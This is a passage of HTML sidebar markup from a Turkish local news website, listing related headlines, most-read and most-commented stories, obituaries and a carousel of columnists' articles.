  <div class="clearfix keywords"><div class="title">Anahtar Kelimeler:</div><a href="http://www.elbistaninsesi.com/haberleri/Kentparktan+13.+y%C4%B1la+%C3%B6zel+indirimler" title="Kentparktan 13. Yıla özel Indirimler haberleri">Kentparktan 13. Yıla özel Indirimler</a></div>
  
          </div>

                <!-- Sağ Blok -->
        <div id="sidebar" class="sidebar span4">
          
          
  
  
    <!-- ILGILI HABERLER  -->
  <div id="ilgiliHaberler-y">
    <div class="ilgiliHaberler-y-t glyphicons white show_big_thumbnails hs-bgc text-uppercase">İlgili Haberler</div>
        <div class="ilgiliHaber">
      <a href="http://www.elbistaninsesi.com/guncel/tohumunu-avrupadan-getirdi-dev-kabak-gorenleri-sasirtiyor-h70945.html"  title="Tohumunu Avrupa’dan getirdi, dev kabak görenleri şaşırtıyor">
        <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/08/tohumunu_avrupadan_getirdi_dev_kabak_gorenleri_sasirtiyor_h70945_be897.jpg" alt="Tohumunu Avrupa’dan getirdi, dev kabak görenleri şaşırtıyor" />
        <span>Tohumunu Avrupa’dan getirdi, dev kabak görenleri...</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="http://www.elbistaninsesi.com/guncel/siyah-cekirdekte-erken-hasat-uyarisi-h70941.html"  title="Siyah çekirdekte erken hasat uyarısı">
        <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/08/siyah_cekirdekte_erken_hasat_uyarisi_h70941_e88e5.jpg" alt="Siyah çekirdekte erken hasat uyarısı" />
        <span>Siyah çekirdekte erken hasat uyarısı</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="http://www.elbistaninsesi.com/guncel/kaymakam-demir-sel-ve-taskinin-yasandigi-gecitte-inceleme-h70940.html"  title="Kaymakam Demir, sel ve taşkının yaşandığı Geçit’te inceleme yaptı">
        <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/08/kaymakam_demir_sel_ve_taskinin_yasandigi_gecitte_inceleme_yapti_h70940_9e5d6.jpg" alt="Kaymakam Demir, sel ve taşkının yaşandığı Geçit’te inceleme yaptı" />
        <span>Kaymakam Demir, sel ve taşkının yaşandığı Geçit’te...</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="http://www.elbistaninsesi.com/guncel/kodazdan-suriyeli-siginmacilar-aciklamasi-h70939.html"  title="Kodaz’dan Suriyeli sığınmacılar açıklaması">
        <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/08/kodazdan_suriyeli_siginmacilar_aciklamasi_h70939_9771a.jpg" alt="Kodaz’dan Suriyeli sığınmacılar açıklaması" />
        <span>Kodaz’dan Suriyeli sığınmacılar açıklaması</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="http://www.elbistaninsesi.com/guncel/baskan-gurbuz-elbistan-dogu-ile-batinin-gecis-noktasi-olacak-h70938.html"  title="Başkan Gürbüz: “Elbistan, doğu ile batının geçiş noktası olacak”">
        <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/08/baskan_gurbuz_elbistan_dogu_ile_batinin_gecis_noktasi_olacak_h70938_ecfae.jpg" alt="Başkan Gürbüz: “Elbistan, doğu ile batının geçiş noktası olacak”" />
        <span>Başkan Gürbüz: “Elbistan, doğu ile batının...</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="http://www.elbistaninsesi.com/guncel/atiksu-aritma-tesisi-hizla-yukseliyor-h70937.html"  title="Atıksu Arıtma Tesisi hızla yükseliyor">
        <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/08/atiksu_aritma_tesisi_hizla_yukseliyor_h70937_94df0.jpg" alt="Atıksu Arıtma Tesisi hızla yükseliyor" />
        <span>Atıksu Arıtma Tesisi hızla yükseliyor</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="http://www.elbistaninsesi.com/guncel/vizontele-koyde-projesi-ile-sinema-ayaklarina-geldi-h70936.html"  title="Vizontele Köyde&#039; projesi ile sinema ayaklarına geldi">
        <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/08/vizontele_koyde_projesi_ile_sinema_ayaklarina_geldi_h70936_29f73.jpg" alt="Vizontele Köyde&#039; projesi ile sinema ayaklarına geldi" />
        <span>Vizontele Köyde&#039; projesi ile sinema ayaklarına...</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="http://www.elbistaninsesi.com/guncel/otomobil-yola-firlayan-basibos-ata-carpti-h70935.html"  title="Otomobil yola fırlayan başıboş ata çarptı">
        <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/08/otomobil_yola_firlayan_basibos_ata_carpti_h70935_14454.jpg" alt="Otomobil yola fırlayan başıboş ata çarptı" />
        <span>Otomobil yola fırlayan başıboş ata çarptı</span>
      </a>
    </div>
      </div>

  
  <!-- EGAZETE -->
  <div class="egazete">
    <div class="header">
      <h5>E-Gazete</h5>
    </div>
    <div class="content">
            <a href="http://www.elbistaninsesi.com/images/sayfalar/16-Ağustos-2021.jpg" title="Elbistanın Sesi - 16.08.2021 Manşeti" target="_blank"><img src="http://www.elbistaninsesi.com/images/sayfalar/thumb_16-Ağustos-2021.jpg" alt="Elbistanın Sesi - 16.08.2021 Manşeti" /></a>
           </div>
  </div>

  
  <!-- SOSYAL  -->
  <div class="hs-sosyal clearfix">
      <div class="hs-box hs-facebook">
        <div class="top">
          <div class="icon"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/fb32.png" alt="Facebook"></div>
          <div class="right">
            <span class="count"><a href="https://facebook.com/elbistaninsesi" class="hs-sdch" target="blank" id="likes"></a></span>
            <span class="text">Beğeni</span>
          </div>
        </div>
        <div class="bottom">
          <a href="https://facebook.com/elbistaninsesi" target="blank" class="hs-sdch" rel="nofollow">Facebook'ta Beğen</a>
        </div>
      </div>
      <div class="hs-box hs-twitter">
        <div class="top">
          <div class="icon"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/twitter32.png" alt="Twitter"></div>
          <div class="right">
            <span class="count"><a href="https://twitter.com/elbistaninsesi" class="hs-sdch" target="blank" id="followers">99</a></span>
            <span class="text">Takipçi</span>
          </div>
        </div>
        <div class="bottom">
          <a href="https://twitter.com/elbistaninsesi" target="blank" class="hs-sdch" rel="nofollow">Twitter'da Takip Et</a>
        </div>
      </div>

      <div class="hs-box hs-youtube">
          <div class="top">
              <div class="icon"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/youtube.png" alt="Youtube"></div>
          </div>
          <div class="bottom">
              <a href="" target="blank" class="hs-sdch" rel="nofollow">Youtube Abone Ol</a>
          </div>
      </div>

      <div class="hs-box hs-instagram">
          <div class="top">
              <div class="icon"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/instagram.png" alt="instagram"></div>
          </div>
          <div class="bottom">
              <a href="" target="blank" class="hs-sdch" rel="nofollow">Instagram Takip</a>
          </div>
      </div>



  </div>

  

  <!-- ENCOKLAR  -->
  <div class="encoklar">
    <div class="accordion">
    	      	<div class="accordion-group">
        	<div class="accordion-heading hs-bgc">
          		<a class="accordion-toggle hs-sdch" data-toggle="collapse" data-parent="#encoklar" href="#collapseOne">
          			<span class="encoklar-icon"><i class="halflings-icon white fire"></i></span><h5>Bu Ay Çok Okunanlar</h5>
				</a>
        	</div>
        	<div id="collapseOne" class="accordion-body collapse in">
          		<div class="accordion-inner">
            		<ul class="en-list">
              		              			<li class="en-hidden en-visible"><a href="http://www.elbistaninsesi.com/guncel/cem-adrian-elbistani-salladi-on-binler-festival-alanina-akin-etti-h70695.html" title="Cem Adrian Elbistanı salladı,..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/07/cem_adrian_elbistani_salladi_on_binler_festival_alanina_akin_etti_h70695_ef971.jpg" alt="Cem Adrian Elbistanı salladı,..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/cem-adrian-elbistani-salladi-on-binler-festival-alanina-akin-etti-h70695.html" title="" ><span class="en-hit">1.</span> <strong>Cem Adrian Elbistan’ı salladı,...</strong> <span class="en-spot en-hidden">‘Türkiye’ye değer, Elbistan’a değer’ sloganıyla düzenlenen...</span></a></div></li>
              		              			<li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/silahli-ve-bicakli-kavgada-kan-akti-2-olu-4-yarali-h70697.html" title="Silahlı ve bıçaklı kavgada kan..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/07/alacak_verecek_kavgasinda_kan_akti_2_olu_4_yarali_h70697_efb0e.jpg" alt="Silahlı ve bıçaklı kavgada kan..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/silahli-ve-bicakli-kavgada-kan-akti-2-olu-4-yarali-h70697.html" title="" ><span class="en-hit">2.</span> <strong>Silahlı ve bıçaklı kavgada kan...</strong> <span class="en-spot en-hidden">Afşin’de, 2 grup arasında çıkan silahlı ve bıçaklı kavgada 2...</span></a></div></li>
              		              			<li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/otomobiller-carpisti-1-olu-6-yarali-h70664.html" title="Otomobiller çarpıştı: 1 ölü 6..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/07/otomobiller_carpisti_1_olu_6_yarali_h70664_5a44d.jpg" alt="Otomobiller çarpıştı: 1 ölü 6..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/otomobiller-carpisti-1-olu-6-yarali-h70664.html" title="" ><span class="en-hit">3.</span> <strong>Otomobiller çarpıştı: 1 ölü 6...</strong> <span class="en-spot en-hidden">Afşin ilçesinde iki otomobilin çarpıştığı kazada 1 kişi hayatını...</span></a></div></li>
              		              			<li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/5-gundur-verdigi-yasam-mucadelesini-kaybetti-h70740.html" title="5 gündür verdiği yaşam mücadelesini..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/07/5_gundur_verdigi_yasam_mucadelesini_kaybetti_h70740_e3fc9.jpg" alt="5 gündür verdiği yaşam mücadelesini..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/5-gundur-verdigi-yasam-mucadelesini-kaybetti-h70740.html" title="" ><span class="en-hit">4.</span> <strong>5 gündür verdiği yaşam mücadelesini...</strong> <span class="en-spot en-hidden">Elbistan’da silahla kendisini vurduğu iddia edilen 18 yaşındaki genç...</span></a></div></li>
              		              			<li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/saganak-yagmur-2-mahallede-sele-donustu-h70825.html" title="Sağanak yağmur 2 mahallede sele dönüştü" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/08/saganak_yagmur_2_mahallede_sele_donustu_h70825_89806.jpg" alt="Sağanak yağmur 2 mahallede sele dönüştü" ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/saganak-yagmur-2-mahallede-sele-donustu-h70825.html" title="" ><span class="en-hit">5.</span> <strong>Sağanak yağmur 2 mahallede sele dönüştü</strong> <span class="en-spot en-hidden">Bölgede öğleden sonra etkisini hissettiren sağanak yağış, ilçeye...</span></a></div></li>
              		            		</ul>
          		</div>
        	</div>
      	</div>
              <div class="accordion-group">
        <div class="accordion-heading hs-bgc">
          <a class="accordion-toggle hs-sdch" data-toggle="collapse" data-parent="#encoklar" href="#collapseTwo">
            <span class="encoklar-icon"><i class="halflings-icon white comments"></i></span><h5>Bu Ay Çok Yorumlananlar</h5></a>
        </div>
        <div id="collapseTwo" class="accordion-body collapse in">
          <div class="accordion-inner">
            <ul class="en-list">
                            <li class="en-hidden en-visible"><a href="http://www.elbistaninsesi.com/vefatlar/fikriye-davdav-h70814.html" title="Fikriye Davdav" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/08/fikriye_davdav_h70814_36c8d.jpg" alt="Fikriye Davdav"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/fikriye-davdav-h70814.html" title="" ><span class="en-hit">1.</span> <strong>Fikriye Davdav</strong> <span class="en-spot en-hidden"></span></a></div></li>
                            <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/aslihan-ozer-39-yasinda-h70921.html" title="Aslıhan Özer 39  yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/08/aslihan_ozer_h70921_8bf4f.jpg" alt="Aslıhan Özer 39  yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/aslihan-ozer-39-yasinda-h70921.html" title="" ><span class="en-hit">2.</span> <strong>Aslıhan Özer 39  yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li>
                            <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/ismet-bozdogan-63-yasinda-h70752.html" title="İsmet Bozdoğan 63 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/08/ismet_bozdogan_63_yasinda_h70752_b331a.jpg" alt="İsmet Bozdoğan 63 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/ismet-bozdogan-63-yasinda-h70752.html" title="" ><span class="en-hit">3.</span> <strong>İsmet Bozdoğan 63 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li>
                            <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/teber-gunes-87-yasinda-h70763.html" title="Teber Güneş 87 yaşında," class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/08/teber_gunes_87_yasinda_h70763_7b263.jpg" alt="Teber Güneş 87 yaşında,"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/teber-gunes-87-yasinda-h70763.html" title="" ><span class="en-hit">4.</span> <strong>Teber Güneş 87 yaşında,</strong> <span class="en-spot en-hidden"></span></a></div></li>
                            <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/ali-kayiran-54-yasinda-h70813.html" title="Ali Kayıran 54 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/08/ali_kayiran_54_yasinda_h70813_bb38d.jpg" alt="Ali Kayıran 54 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/ali-kayiran-54-yasinda-h70813.html" title="" ><span class="en-hit">5.</span> <strong>Ali Kayıran 54 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li>
                          </ul>
          </div>
        </div>
      </div>
        </div>
  </div>

  
  <!-- YAZARLAR -->
  <div id="syazar" class="hs-yazarlar">
    <div class="header">
      <h5><a href="http://www.elbistaninsesi.com/yazarlar/" title="Yazarlar">Yazarlar</a></h5>
            <a class="control left" href="#" id="syprev"></a>
      <a class="control right" href="#" id="synext"></a>
          </div>
    <div class="content">
      <div class="item">
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/tecrube-ile-sabit-11-makale,6297.html" title="TECRÜBE İLE SABİT -11-" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/mehmet-gozukara_1.jpg" alt="Mehmet Gözükara">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/13/mehmet-gozukara" title="Mehmet Gözükara">Mehmet Gözükara</a></h4>
              <a href="http://www.elbistaninsesi.com/tecrube-ile-sabit-11-makale,6297.html" title="TECRÜBE İLE SABİT -11-" >TECRÜBE İLE SABİT -11-</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/elbistan-mukrimin-halil-lisesindeki-talebelik-yillarim-ve-saygideger-hocalarim-makale,6296.html" title="ELBİSTAN MÜKRİMİN HALİL LİSESİNDEKİ TALEBELİK YILLARIM  VE  SAYGIDEĞER HOCALARIM!" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/me.jpg" alt="İlhan Akar">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/81/ilhan-akar" title="İlhan Akar">İlhan Akar</a></h4>
              <a href="http://www.elbistaninsesi.com/elbistan-mukrimin-halil-lisesindeki-talebelik-yillarim-ve-saygideger-hocalarim-makale,6296.html" title="ELBİSTAN MÜKRİMİN HALİL LİSESİNDEKİ TALEBELİK YILLARIM  VE  SAYGIDEĞER HOCALARIM!" >ELBİSTAN MÜKRİMİN HALİL LİSESİNDEKİ TALEBELİK YILLARIM  VE  SAYGIDEĞER HOCALARIM!</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/tiktok-makale,6295.html" title="TİKTOK" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/Can-Ugur_919_1.jpg" alt="Can Uğur">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/17/can-ugur" title="Can Uğur">Can Uğur</a></h4>
              <a href="http://www.elbistaninsesi.com/tiktok-makale,6295.html" title="TİKTOK" >TİKTOK</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/neylesin-hakim-makale,6294.html" title="NEY­LESİN HAKİM" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/Yemliha-Gurlek_688_1.jpg" alt="Yemliha Gürlek">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/31/yemliha-gurlek" title="Yemliha Gürlek">Yemliha Gürlek</a></h4>
              <a href="http://www.elbistaninsesi.com/neylesin-hakim-makale,6294.html" title="NEY­LESİN HAKİM" >NEY­LESİN HAKİM</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/hasretin-safaginda-azazen-makale,6293.html" title="Has­re­tin şa­fa­ğın­da aza­zen" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/Prof._Dr._Mustafa_Necati_DaglY.jpg" alt="Prof. Dr. Mustafa Necati Daglı">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/90/prof-dr-mustafa-necati-dagli" title="Prof. Dr. Mustafa Necati Daglı">Prof. Dr. Mustafa Necati Daglı</a></h4>
              <a href="http://www.elbistaninsesi.com/hasretin-safaginda-azazen-makale,6293.html" title="Has­re­tin şa­fa­ğın­da aza­zen" >Has­re­tin şa­fa­ğın­da aza­zen</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/butun-bildigimiz-makale,6292.html" title="BÜTÜN BİLDİĞİMİZ " >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/ahmet-bulut_1.jpg" alt="Ahmet Bulut">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/11/ahmet-bulut" title="Ahmet Bulut">Ahmet Bulut</a></h4>
              <a href="http://www.elbistaninsesi.com/butun-bildigimiz-makale,6292.html" title="BÜTÜN BİLDİĞİMİZ " >BÜTÜN BİLDİĞİMİZ </a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/afatlar-geldi-makale,6291.html" title="AFAT­LAR GELDİ" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/Nadir-Adbay_499_1.jpg" alt="Mehmet Ayaz">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/6/mehmet-ayaz" title="Mehmet Ayaz">Mehmet Ayaz</a></h4>
              <a href="http://www.elbistaninsesi.com/afatlar-geldi-makale,6291.html" title="AFAT­LAR GELDİ" >AFAT­LAR GELDİ</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/kapitalist-burjuva-ve-demokrasi-makale,6290.html" title="KAPİTALİST BURJUVA VE DEMOKRASİ!" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/mehmetcavaY.jpg" alt="Prof.Dr. Mehmet ÇAVAŞ">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/39/profdr-mehmet-cavas" title="Prof.Dr. Mehmet ÇAVAŞ">Prof.Dr. Mehmet ÇAVAŞ</a></h4>
              <a href="http://www.elbistaninsesi.com/kapitalist-burjuva-ve-demokrasi-makale,6290.html" title="KAPİTALİST BURJUVA VE DEMOKRASİ!" >KAPİTALİST BURJUVA VE DEMOKRASİ!</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/elbistanin-bilinen-koskerlerinin-tamami-makale,6289.html" title="Elbistan’ın bilinen köşkerlerinin tamamı" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/1.jpg" alt="Arif  Bilgin">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/1/arif-bilgin" title="Arif  Bilgin">Arif  Bilgin</a></h4>
              <a href="http://www.elbistaninsesi.com/elbistanin-bilinen-koskerlerinin-tamami-makale,6289.html" title="Elbistan’ın bilinen köşkerlerinin tamamı" >Elbistan’ın bilinen köşkerlerinin tamamı</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/tercihiniz-bes-yil-sonranin-ongorusu-makale,6288.html" title="TERCİHİNİZ: BEŞ YIL SONRANIN ÖNGÖRÜSÜ" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/yazarlar_koYesi.jpg" alt="Aykut YILDIRIM">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/70/aykut-yildirim" title="Aykut YILDIRIM">Aykut YILDIRIM</a></h4>
              <a href="http://www.elbistaninsesi.com/tercihiniz-bes-yil-sonranin-ongorusu-makale,6288.html" title="TERCİHİNİZ: BEŞ YIL SONRANIN ÖNGÖRÜSÜ" >TERCİHİNİZ: BEŞ YIL SONRANIN ÖNGÖRÜSÜ</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/senden-usandim-makale,6285.html" title="SEN­DEN USAN­DIM" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/Ramazan-Pamuk_910_1.jpg" alt="Ramazan Pamuk">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/23/ramazan-pamuk" title="Ramazan Pamuk">Ramazan Pamuk</a></h4>
              <a href="http://www.elbistaninsesi.com/senden-usandim-makale,6285.html" title="SEN­DEN USAN­DIM" >SEN­DEN USAN­DIM</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/elbistan-ve-civarinda-bulunan-tarihi-yapilar-makale,6282.html" title="Elbistan ve Civarında Bulunan Tarihi Yapılar" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/034421b8-4158-4551-83a7-c308f4156fe9.jpg" alt="Orhan SAYDAM">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/89/orhan-saydam" title="Orhan SAYDAM">Orhan SAYDAM</a></h4>
              <a href="http://www.elbistaninsesi.com/elbistan-ve-civarinda-bulunan-tarihi-yapilar-makale,6282.html" title="Elbistan ve Civarında Bulunan Tarihi Yapılar" >Elbistan ve Civarında Bulunan Tarihi Yapılar</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/elli-saniye-makale,6281.html" title="ELLİ SANİYE" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/Makale.jpg" alt="Meltem Göçer">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/53/meltem-gocer" title="Meltem Göçer">Meltem Göçer</a></h4>
              <a href="http://www.elbistaninsesi.com/elli-saniye-makale,6281.html" title="ELLİ SANİYE" >ELLİ SANİYE</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/uzuldugum-seye-bak-makale,6274.html" title="ÜZÜLDÜĞÜM ŞEYE BAK" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/m-emin-elagoz_1.jpg" alt="M. Emin ELAGÖZ">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/7/m-emin-elagoz" title="M. Emin ELAGÖZ">M. Emin ELAGÖZ</a></h4>
              <a href="http://www.elbistaninsesi.com/uzuldugum-seye-bak-makale,6274.html" title="ÜZÜLDÜĞÜM ŞEYE BAK" >ÜZÜLDÜĞÜM ŞEYE BAK</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/zeynepim-makale,6271.html" title="ZEY­NEP’İM" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/ceritli.jpg" alt="Celal Ceritli">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/95/celal-ceritli" title="Celal Ceritli">Celal Ceritli</a></h4>
              <a href="http://www.elbistaninsesi.com/zeynepim-makale,6271.html" title="ZEY­NEP’İM" >ZEY­NEP’İM</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/yasamak-icin-mi-yemek-yemek-icin-mi-yasamak-makale,6267.html" title="YAŞAMAK İÇİN Mİ YEMEK, YEMEK İÇİN Mİ YAŞAMAK" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/Nermin-yılmaz-akbalaban.jpg" alt="Nermin Yılmaz Akbalaban">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/96/nermin-yilmaz-akbalaban" title="Nermin Yılmaz Akbalaban">Nermin Yılmaz Akbalaban</a></h4>
              <a href="http://www.elbistaninsesi.com/yasamak-icin-mi-yemek-yemek-icin-mi-yasamak-makale,6267.html" title="YAŞAMAK İÇİN Mİ YEMEK, YEMEK İÇİN Mİ YAŞAMAK" >YAŞAMAK İÇİN Mİ YEMEK, YEMEK İÇİN Mİ YAŞAMAK</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/profdrfuat-sezginin-ardindan-5-makale,6258.html" title="Prof.Dr.Fuat Sezgin’in Ardından -5-" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/6faefd20-9b1e-418c-b102-3b2d1b2c5463.jpg" alt="Adnan YILMAZ">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/88/adnan-yilmaz" title="Adnan YILMAZ">Adnan YILMAZ</a></h4>
              <a href="http://www.elbistaninsesi.com/profdrfuat-sezginin-ardindan-5-makale,6258.html" title="Prof.Dr.Fuat Sezgin’in Ardından -5-" >Prof.Dr.Fuat Sezgin’in Ardından -5-</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/neylesin-makale,6251.html" title="NEY­LESİN" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/11.jpg" alt="Nusret Yılmaz Külekçi">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/74/nusret-yilmaz-kulekci" title="Nusret Yılmaz Külekçi">Nusret Yılmaz Külekçi</a></h4>
              <a href="http://www.elbistaninsesi.com/neylesin-makale,6251.html" title="NEY­LESİN" >NEY­LESİN</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
